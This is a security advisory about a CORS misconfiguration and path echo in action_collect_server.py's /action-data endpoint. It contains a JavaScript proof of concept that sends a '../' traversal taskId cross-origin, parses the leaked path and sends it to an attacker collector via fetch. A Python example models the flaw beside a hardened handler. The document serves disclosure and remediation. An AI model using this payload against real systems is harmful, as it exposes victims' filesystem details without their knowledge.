This vulnerability was found by Songwu (security researcher), Zeyu Luo (security researcher), Dr. CAO Yinfeng, Kevin (The Hong Kong Polytechnic University / HKCT Institute of Higher Education)
Vulnerability description
The /action-data endpoint in action_collect_server.py, after successfully processing a request, echoes a string containing the server-side filesystem path of the file it just wrote ("Event received and saved as <path>") in the HTTP response body. The echoed path reflects the submitted taskId unchanged, including any "../" segments, so a single request also reveals the layout of the data directory (date folder, file naming scheme and timestamp). Because the endpoint additionally has a CORS misconfiguration that allows arbitrary cross-origin access, an attacker can embed JavaScript in a public web page that silently calls the endpoint from the victim's browser (the collector is reached at localhost:4934 in the PoC below) and exfiltrates the leaked path to an attacker-controlled server. No user interaction beyond visiting the attacker's page is required, and the victim sees nothing.
POC
<!DOCTYPE html>
<html>
<body>
<pre id="out">requesting...</pre>
<script>
const out = document.getElementById('out');
const log = s => out.textContent += s + '\n';
// attacker-side receiver (e.g. python3 -m http.server 8000)
const COLLECTOR = 'http://127.0.0.1:8000';
// Cross-origin POST to the victim's local collector. The server's CORS
// misconfiguration lets this page read the response body.
fetch('http://localhost:4934/action-data', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    // the "../" segments are echoed back verbatim in the saved path
    taskId: "../../../../tmp/poc_infoleak_probe",
    probe: true
  })
})
  .then(r => r.json())
  .then(data => {
    // the server replies "Event received and saved as <path>"
    const savedPath = data.message?.replace('Event received and saved as ', '').trim();
    log('[+] response: ' + JSON.stringify(data));
    log('');
    if (!savedPath) return;
    // pull the directory layout details out of the leaked path
    const dateFolder = savedPath.match(/data\/(\d{8})\//)?.[1];
    const filename = savedPath.split('/').pop();
    const timestamp = filename?.match(/summary_event_(\d{8}_\d{6})/)?.[1];
    const dotdots = (savedPath.match(/\.\.\//g) || []).length;
    log('═══ leak info ═══');
    log(`write path : ${savedPath}`);
    log(`data dir   : ${dateFolder}`);
    log(`timestamp  : ${timestamp}`);
    log(`CWD depth  : ${dotdots} level(s) above data/`);
    log('');
    // send the extracted data to the attacker's collector
    const exfil = { savedPath, dateFolder, timestamp, cwdDepth: dotdots };
    fetch(`${COLLECTOR}/collect?data=` + encodeURIComponent(JSON.stringify(exfil)))
      .then(() => log('[+] data sent to ' + COLLECTOR))
      .catch(() => log('[*] send failed (ignore if the collector is not running)'));
  })
  .catch(e => log('[-] fail: ' + e));
</script>
</body>
</html>
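To make the two flaws from the description concrete, the following is an added example (written for this page, not the code of action_collect_server.py, whose internals the advisory does not show). It models the flawed handler next to a hardened one: the taskId syntax, the storage layout under BASE_DIR, the allowlisted origin and the receipt field are all assumptions. The vulnerable model only computes the destination path instead of writing it, so the probe from the PoC above never touches anything outside the example's temp directory.

```python
import json
import re
import secrets
import tempfile
from datetime import datetime
from pathlib import Path
from typing import Optional

# Assumed storage layout (the advisory only shows the echoed string, not the
# server code): <BASE_DIR>/data/<YYYYMMDD>/<taskId>/summary_event_<ts>.json
BASE_DIR = Path(tempfile.mkdtemp(prefix="action_collect_example_"))
ALLOWED_ORIGINS = {"https://dashboard.example.test"}  # assumed legitimate front-end
TASK_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")       # assumed taskId syntax


def _relative_path(task_id: str, now: datetime) -> str:
    return f"data/{now:%Y%m%d}/{task_id}/summary_event_{now:%Y%m%d_%H%M%S}.json"


def vulnerable_handle(body: dict, origin: str, now: Optional[datetime] = None):
    """Model of the flawed endpoint: taskId is concatenated into the path
    unvalidated, the relative path is echoed back verbatim, and any origin
    may read the response. The destination is computed, not written."""
    now = now or datetime.now()
    rel = _relative_path(str(body["taskId"]), now)
    target = (BASE_DIR / rel).resolve()               # "../" segments are honoured
    headers = {"Access-Control-Allow-Origin": "*"}    # the CORS misconfiguration
    return {"message": f"Event received and saved as {rel}"}, headers, target


def cors_headers(origin: str) -> dict:
    """Allowlisted origins get their own origin echoed back; all others get no
    CORS header, so the browser refuses to hand the response body to the page."""
    if origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}
    return {}


def hardened_handle(body: dict, origin: str, now: Optional[datetime] = None):
    """Hardened counterpart: strict taskId syntax, containment check on the
    resolved path, and an opaque receipt instead of a filesystem path."""
    now = now or datetime.now()
    task_id = str(body.get("taskId", ""))
    if not TASK_ID_RE.fullmatch(task_id):
        return {"error": "invalid taskId"}, cors_headers(origin), None
    target = (BASE_DIR / _relative_path(task_id, now)).resolve()
    if BASE_DIR.resolve() not in target.parents:       # defence in depth
        return {"error": "invalid taskId"}, cors_headers(origin), None
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(json.dumps(body))
    receipt = secrets.token_hex(8)                    # opaque id; path stays server-side
    return {"message": "Event received", "receipt": receipt}, cors_headers(origin), target


if __name__ == "__main__":
    probe = {"taskId": "../../../../tmp/poc_infoleak_probe", "probe": True}
    resp, hdr, where = vulnerable_handle(probe, "https://attacker.example")
    print("vulnerable:", resp, hdr, "-> would write", where)
    print("hardened  :", hardened_handle(probe, "https://attacker.example")[:2])
    print("hardened  :", hardened_handle({"taskId": "task_42"}, "https://dashboard.example.test")[:2])
```

Running it shows the vulnerable reply carrying the four "../" segments and a resolved destination above BASE_DIR, while the hardened handler rejects the probe, omits the CORS header for the attacker origin, and returns only "Event received" plus a receipt for a valid taskId from the allowlisted origin. The two fixes are independent: removing the path from the reply stops the information leak even if CORS is later loosened again, and the origin allowlist stops a cross-origin page from reading any reply at all.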